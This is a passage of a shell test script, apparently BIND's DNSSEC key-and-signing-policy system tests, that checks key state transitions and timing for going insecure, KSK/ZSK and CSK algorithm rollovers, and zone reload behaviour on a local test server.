"$DIR" "KEY1" "now" "withdrawn" "$ZONE" +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the DS becomes HIDDEN. This happens after the +# parent propagation delay, retire safety delay, and DS TTL: +# 1h + 1h + 1d = 26h = 93600 seconds. +check_next_key_event 93600 + +# +# Zone: step2.going-insecure-dynamic.kasp +# +set_zone "step2.going-insecure-dynamic.kasp" +set_dynamic +set_policy "insecure" "2" "7200" +set_server "ns6" "10.53.0.6" + +# The DS is long enough removed from the zone to be considered HIDDEN. +# This means the DNSKEY and the KSK signatures can be removed. +set_keystate "KEY1" "STATE_DS" "hidden" +set_keystate "KEY1" "STATE_DNSKEY" "unretentive" +set_keystate "KEY1" "STATE_KRRSIG" "unretentive" +set_keysigning "KEY1" "no" + +set_keystate "KEY2" "STATE_DNSKEY" "unretentive" +set_keystate "KEY2" "STATE_ZRRSIG" "unretentive" +set_zonesigning "KEY2" "no" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +# Next key event is when the DNSKEY becomes HIDDEN. This happens after the +# propagation delay, plus DNSKEY TTL: +# 5m + 2h = 125m = 7500 seconds. +check_next_key_event 7500 + +# +# Zone: step1.going-straight-to-none.kasp +# +set_zone "step1.going-straight-to-none.kasp" +set_policy "none" "1" "3600" +set_server "ns6" "10.53.0.6" + +# The zone will go bogus after signatures expire, but remains validly signed for now. + +# Key properties. +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" +# This policy only has one key. +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +dnssec_verify + +# +# Testing KSK/ZSK algorithm rollover. +# + +# Policy parameters. +# Lksk: unlimited +# Lzsk: unlimited +Lksk=0 +Lzsk=0 + +# +# Zone: step1.algorithm-roll.kasp +# +set_zone "step1.algorithm-roll.kasp" +set_policy "ecdsa256" "4" "3600" +set_server "ns6" "10.53.0.6" +# Old RSASHA1 keys. +key_clear "KEY1" +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "8" "RSASHA256" "2048" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +key_clear "KEY2" +set_keyrole "KEY2" "zsk" +set_keylifetime "KEY2" "0" +set_keyalgorithm "KEY2" "8" "RSASHA256" "2048" +set_keysigning "KEY2" "no" +set_zonesigning "KEY2" "yes" +# New ECDSAP256SHA256 keys. +key_clear "KEY3" +set_keyrole "KEY3" "ksk" +set_keylifetime "KEY3" "0" +set_keyalgorithm "KEY3" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY3" "yes" +set_zonesigning "KEY3" "no" + +key_clear "KEY4" +set_keyrole "KEY4" "zsk" +set_keylifetime "KEY4" "0" +set_keyalgorithm "KEY4" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY4" "no" +set_zonesigning "KEY4" "yes" +# The RSAHSHA1 keys are outroducing. +set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" +set_keystate "KEY2" "GOAL" "hidden" +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" +# The ECDSAP256SHA256 keys are introducing. +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_KRRSIG" "rumoured" +set_keystate "KEY3" "STATE_DS" "hidden" +set_keystate "KEY4" "GOAL" "omnipresent" +set_keystate "KEY4" "STATE_DNSKEY" "rumoured" +set_keystate "KEY4" "STATE_ZRRSIG" "rumoured" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys are published and activated. +rollover_predecessor_keytimes 0 +# - KSK must be retired since it no longer matches the policy. +keyfile=$(key_get KEY1 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.ksk +retired=$(awk '{print $3}' < retired.test${n}.ksk) +set_keytime "KEY1" "RETIRED" "${retired}" +# - The key is removed after the retire interval: +# IretKSK = TTLds + DprpP + retire-safety +# TTLds: 2h (7200 seconds) +# DprpP: 1h (3600 seconds) +# retire-safety: 2h (7200 seconds) +# IretKSK: 5h (18000 seconds) +IretKSK=18000 +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" +# - ZSK must be retired since it no longer matches the policy. +keyfile=$(key_get KEY2 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.zsk +retired=$(awk '{print $3}' < retired.test${n}.zsk) +set_keytime "KEY2" "RETIRED" "${retired}" +# - The key is removed after the retire interval: +# IretZSK = TTLsig + Dprp + Dsgn + retire-safety +# TTLsig: 6h (21600 seconds) +# Dprp: 1h (3600 seconds) +# Dsgn: 25d (2160000 seconds) +# retire-safety: 2h (7200 seconds) +# IretZSK: 25d9h (2192400 seconds) +IretZSK=2192400 +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" +# - The new KSK is published and activated. +created=$(key_get KEY3 CREATED) +set_keytime "KEY3" "PUBLISHED" "${created}" +set_keytime "KEY3" "ACTIVE" "${created}" +# - It takes TTLsig + Dprp + publish-safety hours to propagate the zone. +# TTLsig: 6h (39600 seconds) +# Dprp: 1h (3600 seconds) +# publish-safety: 1h (3600 seconds) +# Ipub: 8h (28800 seconds) +Ipub=28800 +set_addkeytime "KEY3" "SYNCPUBLISH" "${created}" "${Ipub}" +# - The new ZSK is published and activated. +created=$(key_get KEY4 CREATED) +set_keytime "KEY4" "PUBLISHED" "${created}" +set_keytime "KEY4" "ACTIVE" "${created}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the ecdsa256 keys have been propagated. +# This is the DNSKEY TTL plus publish safety plus zone propagation delay: +# 3 times an hour: 10800 seconds. +check_next_key_event 10800 + +# +# Zone: step2.algorithm-roll.kasp +# +set_zone "step2.algorithm-roll.kasp" +set_policy "ecdsa256" "4" "3600" +set_server "ns6" "10.53.0.6" +# The RSAHSHA1 keys are outroducing, but need to stay present until the new +# algorithm chain of trust has been established. Thus the properties, timings +# and states of the KEY1 and KEY2 are the same as above. + +# The ECDSAP256SHA256 keys are introducing. The DNSKEY RRset is omnipresent, +# but the zone signatures are not. +set_keystate "KEY3" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY3" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY4" "STATE_DNSKEY" "omnipresent" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys were activated three hours ago (10800 seconds). +rollover_predecessor_keytimes -10800 +# - KSK must be retired since it no longer matches the policy. +created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "RETIRED" "${created}" +set_addkeytime "KEY1" "REMOVED" "${created}" "${IretKSK}" +# - ZSK must be retired since it no longer matches the policy. +created=$(key_get KEY2 CREATED) +set_keytime "KEY2" "RETIRED" "${created}" +set_addkeytime "KEY2" "REMOVED" "${created}" "${IretZSK}" +# - The new keys are published 3 hours ago. +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -10800 +set_addkeytime "KEY3" "ACTIVE" "${created}" -10800 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" "${Ipub}" + +created=$(key_get KEY4 CREATED) +set_addkeytime "KEY4" "PUBLISHED" "${created}" -10800 +set_addkeytime "KEY4" "ACTIVE" "${created}" -10800 + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when all zone signatures are signed with the new +# algorithm. This is the max-zone-ttl plus zone propagation delay +# plus retire safety: 6h + 1h + 2h. But three hours have already passed +# (the time it took to make the DNSKEY omnipresent), so the next event +# should be scheduled in 6 hour: 21600 seconds. Prevent intermittent +# false positives on slow platforms by subtracting the number of seconds +# which passed between key creation and invoking 'rndc reconfig'. +next_time=$((21600-time_passed)) +check_next_key_event $next_time + +# +# Zone: step3.algorithm-roll.kasp +# +set_zone "step3.algorithm-roll.kasp" +set_policy "ecdsa256" "4" "3600" +set_server "ns6" "10.53.0.6" +# The ECDSAP256SHA256 keys are introducing. +set_keystate "KEY4" "STATE_ZRRSIG" "omnipresent" +# The DS can be swapped. +set_keystate "KEY1" "STATE_DS" "unretentive" +set_keystate "KEY3" "STATE_DS" "rumoured" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# Check that CDS publication is logged. +check_cdslog "$DIR" "$ZONE" KEY3 + +# Set expected key times: +# - The old keys were activated 9 hours ago (32400 seconds). +rollover_predecessor_keytimes -32400 +# - And retired 6 hours ago (21600 seconds). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -21600 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" + +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "RETIRED" "${created}" -21600 +retired=$(key_get KEY2 RETIRED) +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" +# - The new keys are published 9 hours ago. +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -32400 +set_addkeytime "KEY3" "ACTIVE" "${created}" -32400 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" ${Ipub} + +created=$(key_get KEY4 CREATED) +set_addkeytime "KEY4" "PUBLISHED" "${created}" -32400 +set_addkeytime "KEY4" "ACTIVE" "${created}" -32400 + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Tell named we "saw" the parent swap the DS and see if the next key event is +# scheduled at the correct time. +rndc_checkds "$SERVER" "$DIR" KEY1 "now" "withdrawn" "$ZONE" +rndc_checkds "$SERVER" "$DIR" KEY3 "now" "published" "$ZONE" +# Next key event is when the DS becomes OMNIPRESENT. This happens after the +# parent propagation delay, retire safety delay, and DS TTL: +# 1h + 2h + 2h = 5h = 18000 seconds. +check_next_key_event 18000 + +# +# Zone: step4.algorithm-roll.kasp +# +set_zone "step4.algorithm-roll.kasp" +set_policy "ecdsa256" "4" "3600" +set_server "ns6" "10.53.0.6" +# The old DS is HIDDEN, we can remove the old algorithm DNSKEY/RRSIG records. +set_keysigning "KEY1" "no" +set_keystate "KEY1" "STATE_DNSKEY" "unretentive" +set_keystate "KEY1" "STATE_KRRSIG" "unretentive" +set_keystate "KEY1" "STATE_DS" "hidden" + +set_zonesigning "KEY2" "no" +set_keystate "KEY2" "GOAL" "hidden" +set_keystate "KEY2" "STATE_DNSKEY" "unretentive" +set_keystate "KEY2" "STATE_ZRRSIG" "unretentive" +# The ECDSAP256SHA256 DS is now OMNIPRESENT. +set_keystate "KEY3" "STATE_DS" "omnipresent" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys were activated 38 hours ago (136800 seconds). +rollover_predecessor_keytimes -136800 +# - And retired 35 hours ago (126000 seconds). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -126000 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" + +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "RETIRED" "${created}" -126000 +retired=$(key_get KEY2 RETIRED) +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" + +# - The new keys are published 38 hours ago. +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -136800 +set_addkeytime "KEY3" "ACTIVE" "${created}" -136800 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" ${Ipub} + +created=$(key_get KEY4 CREATED) +set_addkeytime "KEY4" "PUBLISHED" "${created}" -136800 +set_addkeytime "KEY4" "ACTIVE" "${created}" -136800 + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the old DNSKEY becomes HIDDEN. This happens after the +# DNSKEY TTL plus zone propagation delay (2h). +check_next_key_event 7200 + +# +# Zone: step5.algorithm-roll.kasp +# +set_zone "step5.algorithm-roll.kasp" +set_policy "ecdsa256" "4" "3600" +set_server "ns6" "10.53.0.6" +# The DNSKEY becomes HIDDEN. +set_keystate "KEY1" "STATE_DNSKEY" "hidden" +set_keystate "KEY1" "STATE_KRRSIG" "hidden" +set_keystate "KEY2" "STATE_DNSKEY" "hidden" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys were activated 40 hours ago (144000 seconds) +rollover_predecessor_keytimes -144000 +# - And retired 37 hours ago (133200 seconds). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -133200 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" + +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "RETIRED" "${created}" -133200 +retired=$(key_get KEY2 RETIRED) +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" + +# The new keys are published 40 hours ago. +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -144000 +set_addkeytime "KEY3" "ACTIVE" "${created}" -144000 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" ${Ipub} + +created=$(key_get KEY4 CREATED) +set_addkeytime "KEY4" "PUBLISHED" "${created}" -144000 +set_addkeytime "KEY4" "ACTIVE" "${created}" -144000 + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the RSASHA1 signatures become HIDDEN. This happens +# after the max-zone-ttl plus zone propagation delay plus retire safety +# (6h + 1h + 2h) minus the time already passed since the UNRETENTIVE state has +# been reached (2h): 9h - 2h = 7h = 25200 seconds. Prevent intermittent +# false positives on slow platforms by subtracting the number of seconds +# which passed between key creation and invoking 'rndc reconfig'. +next_time=$((25200-time_passed)) +check_next_key_event $next_time + +# +# Zone: step6.algorithm-roll.kasp +# +set_zone "step6.algorithm-roll.kasp" +set_policy "ecdsa256" "4" "3600" +set_server "ns6" "10.53.0.6" +# The old zone signatures (KEY2) should now also be HIDDEN. +set_keystate "KEY2" "STATE_ZRRSIG" "hidden" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys were activated 47 hours ago (169200 seconds) +rollover_predecessor_keytimes -169200 +# - And retired 44 hours ago (158400 seconds). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -158400 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" + +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "RETIRED" "${created}" -158400 +retired=$(key_get KEY2 RETIRED) +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" + +# The new keys are published 47 hours ago. +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -169200 +set_addkeytime "KEY3" "ACTIVE" "${created}" -169200 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" ${Ipub} + +created=$(key_get KEY4 CREATED) +set_addkeytime "KEY4" "PUBLISHED" "${created}" -169200 +set_addkeytime "KEY4" "ACTIVE" "${created}" -169200 + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is never since we established the policy and the keys have +# an unlimited lifetime. Fallback to the default loadkeys interval. +check_next_key_event 3600 + +# +# Testing CSK algorithm rollover. +# + +# Policy parameters. +# Lcsk: unlimited +Lcksk=0 + +# +# Zone: step1.csk-algorithm-roll.kasp +# +set_zone "step1.csk-algorithm-roll.kasp" +set_policy "csk-algoroll" "2" "3600" +set_server "ns6" "10.53.0.6" +# Old RSASHA1 key. +key_clear "KEY1" +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "8" "RSASHA256" "2048" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +# New ECDSAP256SHA256 key. +key_clear "KEY2" +set_keyrole "KEY2" "csk" +set_keylifetime "KEY2" "0" +set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY2" "yes" +set_zonesigning "KEY2" "yes" +key_clear "KEY3" +key_clear "KEY4" +# The RSAHSHA1 key is outroducing. +set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" +# The ECDSAP256SHA256 key is introducing. +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "rumoured" +set_keystate "KEY2" "STATE_KRRSIG" "rumoured" +set_keystate "KEY2" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY2" "STATE_DS" "hidden" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - CSK must be retired since it no longer matches the policy. +csk_rollover_predecessor_keytimes 0 +keyfile=$(key_get KEY1 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.ksk +retired=$(awk '{print $3}' < retired.test${n}.ksk) +set_keytime "KEY1" "RETIRED" "${retired}" +# - The key is removed after the retire interval: +# IretZSK = TTLsig + Dprp + Dsgn + retire-safety +# TTLsig: 6h (21600 seconds) +# Dprp: 1h (3600 seconds) +# Dsgn: 25d (2160000 seconds) +# retire-safety: 2h (7200 seconds) +# IretZSK: 25d9h (2192400 seconds) +IretCSK=2192400 +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretCSK}" +# - The new CSK is published and activated. +created=$(key_get KEY2 CREATED) +set_keytime "KEY2" "PUBLISHED" "${created}" +set_keytime "KEY2" "ACTIVE" "${created}" +# - It takes TTLsig + Dprp + publish-safety hours to propagate the zone. +# TTLsig: 6h (39600 seconds) +# Dprp: 1h (3600 seconds) +# publish-safety: 1h (3600 seconds) +# Ipub: 8h (28800 seconds) +Ipub=28800 +set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" "${Ipub}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the new key has been propagated. +# This is the DNSKEY TTL plus publish safety plus zone propagation delay: +# 3 times an hour: 10800 seconds. +check_next_key_event 10800 + +# +# Zone: step2.csk-algorithm-roll.kasp +# +set_zone "step2.csk-algorithm-roll.kasp" +set_policy "csk-algoroll" "2" "3600" +set_server "ns6" "10.53.0.6" +# The RSAHSHA1 key is outroducing, but need to stay present until the new +# algorithm chain of trust has been established. Thus the properties, timings +# and states of KEY1 is the same as above. +# +# The ECDSAP256SHA256 keys are introducing. The DNSKEY RRset is omnipresent, +# but the zone signatures are not. +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_KRRSIG" "omnipresent" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old key was activated three hours ago (10800 seconds). +csk_rollover_predecessor_keytimes -10800 +# - CSK must be retired since it no longer matches the policy. +created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "RETIRED" "${created}" +set_addkeytime "KEY1" "REMOVED" "${created}" "${IretCSK}" +# - The new key was published 3 hours ago. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -10800 +set_addkeytime "KEY2" "ACTIVE" "${created}" -10800 +published=$(key_get KEY2 PUBLISHED) +set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" "${Ipub}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when all zone signatures are signed with the new +# algorithm. This is the max-zone-ttl plus zone propagation delay +# plus retire safety: 6h + 1h + 2h. But three hours have already passed +# (the time it took to make the DNSKEY omnipresent), so the next event +# should be scheduled in 6 hour: 21600 seconds. Prevent intermittent +# false positives on slow platforms by subtracting the number of seconds +# which passed between key creation and invoking 'rndc reconfig'. +next_time=$((21600-time_passed)) +check_next_key_event $next_time + +# +# Zone: step3.csk-algorithm-roll.kasp +# +set_zone "step3.csk-algorithm-roll.kasp" +set_policy "csk-algoroll" "2" "3600" +set_server "ns6" "10.53.0.6" +# The RSAHSHA1 key is outroducing, and it is time to swap the DS. +# The ECDSAP256SHA256 key is introducing. The DNSKEY RRset and all signatures +# are now omnipresent, so the DS can be introduced. +set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" +# The old DS (KEY1) can be withdrawn and the new DS (KEY2) can be introduced. +set_keystate "KEY1" "STATE_DS" "unretentive" +set_keystate "KEY2" "STATE_DS" "rumoured" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# Check that CDS publication is logged. +check_cdslog "$DIR" "$ZONE" KEY2 + +# Set expected key times: +# - The old key was activated 9 hours ago (32400 seconds). +csk_rollover_predecessor_keytimes -32400 +# - And was retired 6 hours ago (21600 seconds). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -21600 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretCSK}" +# - The new key was published 9 hours ago. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -32400 +set_addkeytime "KEY2" "ACTIVE" "${created}" -32400 +published=$(key_get KEY2 PUBLISHED) +set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" "${Ipub}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# We ignore any parent registration delay, so set the DS publish time to now. +rndc_checkds "$SERVER" "$DIR" KEY1 "now" "withdrawn" "$ZONE" +rndc_checkds "$SERVER" "$DIR" KEY2 "now" "published" "$ZONE" +# Next key event is when the DS becomes OMNIPRESENT. This happens after the +# parent propagation delay, retire safety delay, and DS TTL: +# 1h + 2h + 2h = 5h = 18000 seconds. +check_next_key_event 18000 + +# +# Zone: step4.csk-algorithm-roll.kasp +# +set_zone "step4.csk-algorithm-roll.kasp" +set_policy "csk-algoroll" "2" "3600" +set_server "ns6" "10.53.0.6" +# The old DS is HIDDEN, we can remove the old algorithm DNSKEY/RRSIG records. +set_keysigning "KEY1" "no" +set_zonesigning "KEY1" "no" +set_keystate "KEY1" "STATE_DNSKEY" "unretentive" +set_keystate "KEY1" "STATE_KRRSIG" "unretentive" +set_keystate "KEY1" "STATE_ZRRSIG" "unretentive" +set_keystate "KEY1" "STATE_DS" "hidden" +# The ECDSAP256SHA256 DS is now OMNIPRESENT. +set_keystate "KEY2" "STATE_DS" "omnipresent" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old key was activated 38 hours ago (136800 seconds) +csk_rollover_predecessor_keytimes -136800 +# - And retired 35 hours ago (126000 seconds). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -126000 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretCSK}" +# - The new key was published 38 hours ago. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -136800 +set_addkeytime "KEY2" "ACTIVE" "${created}" -136800 +published=$(key_get KEY2 PUBLISHED) +set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" ${Ipub} + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the old DNSKEY becomes HIDDEN. This happens after the +# DNSKEY TTL plus zone propagation delay (2h). +check_next_key_event 7200 + +# +# Zone: step5.csk-algorithm-roll.kasp +# +set_zone "step5.csk-algorithm-roll.kasp" +set_policy "csk-algoroll" "2" "3600" +set_server "ns6" "10.53.0.6" +# The DNSKEY becomes HIDDEN. +set_keystate "KEY1" "STATE_DNSKEY" "hidden" +set_keystate "KEY1" "STATE_KRRSIG" "hidden" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old key was activated 40 hours ago (144000 seconds) +csk_rollover_predecessor_keytimes -144000 +# - And retired 37 hours ago (133200 seconds). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -133200 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretCSK}" +# - The new key was published 40 hours ago. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -144000 +set_addkeytime "KEY2" "ACTIVE" "${created}" -144000 +published=$(key_get KEY2 PUBLISHED) +set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" ${Ipub} + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the RSASHA1 signatures become HIDDEN. This happens +# after the max-zone-ttl plus zone propagation delay plus retire safety +# (6h + 1h + 2h) minus the time already passed since the UNRETENTIVE state has +# been reached (2h): 9h - 2h = 7h = 25200 seconds. Prevent intermittent +# false positives on slow platforms by subtracting the number of seconds +# which passed between key creation and invoking 'rndc reconfig'. +next_time=$((25200-time_passed)) +check_next_key_event $next_time + +# +# Zone: step6.csk-algorithm-roll.kasp +# +set_zone "step6.csk-algorithm-roll.kasp" +set_policy "csk-algoroll" "2" "3600" +set_server "ns6" "10.53.0.6" +# The zone signatures should now also be HIDDEN. +set_keystate "KEY1" "STATE_ZRRSIG" "hidden" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys were activated 47 hours ago (169200 seconds) +csk_rollover_predecessor_keytimes -169200 +# - And retired 44 hours ago (158400 seconds). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -158400 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretCSK}" +# - The new key was published 47 hours ago. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -169200 +set_addkeytime "KEY2" "ACTIVE" "${created}" -169200 +published=$(key_get KEY2 PUBLISHED) +set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" ${Ipub} + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is never since we established the policy and the keys have +# an unlimited lifetime. Fallback to the default loadkeys interval. +check_next_key_event 3600 + +_check_soa_ttl() { + dig_with_opts @10.53.0.6 example SOA > dig.out.ns6.test$n.soa2 || return 1 + soa1=$(awk '$4 == "SOA" { print $7 }' dig.out.ns6.test$n.soa1) + soa2=$(awk '$4 == "SOA" { print $7 }' dig.out.ns6.test$n.soa2) + ttl1=$(awk '$4 == "SOA" { print $2 }' dig.out.ns6.test$n.soa1) + ttl2=$(awk '$4 == "SOA" { print $2 }' dig.out.ns6.test$n.soa2) + test ${soa1:-1000} -lt ${soa2:-0} || return 1 + test ${ttl1:-0} -eq $1 || return 1 + test ${ttl2:-0} -eq $2 || return 1 +} + +n=$((n+1)) +echo_i "Check that 'rndc reload' of just the serial updates the signed instance ($n)" +TSIG= +ret=0 +dig_with_opts @10.53.0.6 example SOA > dig.out.ns6.test$n.soa1 || ret=1 +cp ns6/example2.db.in ns6/example.db || ret=1 +nextpart ns6/named.run > /dev/null +rndccmd 10.53.0.6 reload || ret=1 +wait_for_log 3 "all zones loaded" ns6/named.run +# Check that the SOA SERIAL increases and check the TTLs (should be 300 as +# defined in ns6/example2.db.in). +retry_quiet 10 _check_soa_ttl 300 300 || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "Check that restart with zone changes and deleted journal works ($n)" +TSIG= +ret=0 +dig_with_opts @10.53.0.6 example SOA > dig.out.ns6.test$n.soa1 || ret=1 +stop_server --use-rndc --port ${CONTROLPORT} ns6 +# TTL of all records change from 300 to 400 +cp ns6/example3.db.in ns6/example.db || ret=1 +rm ns6/example.db.jnl +nextpart ns6/named.run > /dev/null +start_server --noclean --restart --port ${PORT} ns6 +wait_for_log 3 "all zones loaded" 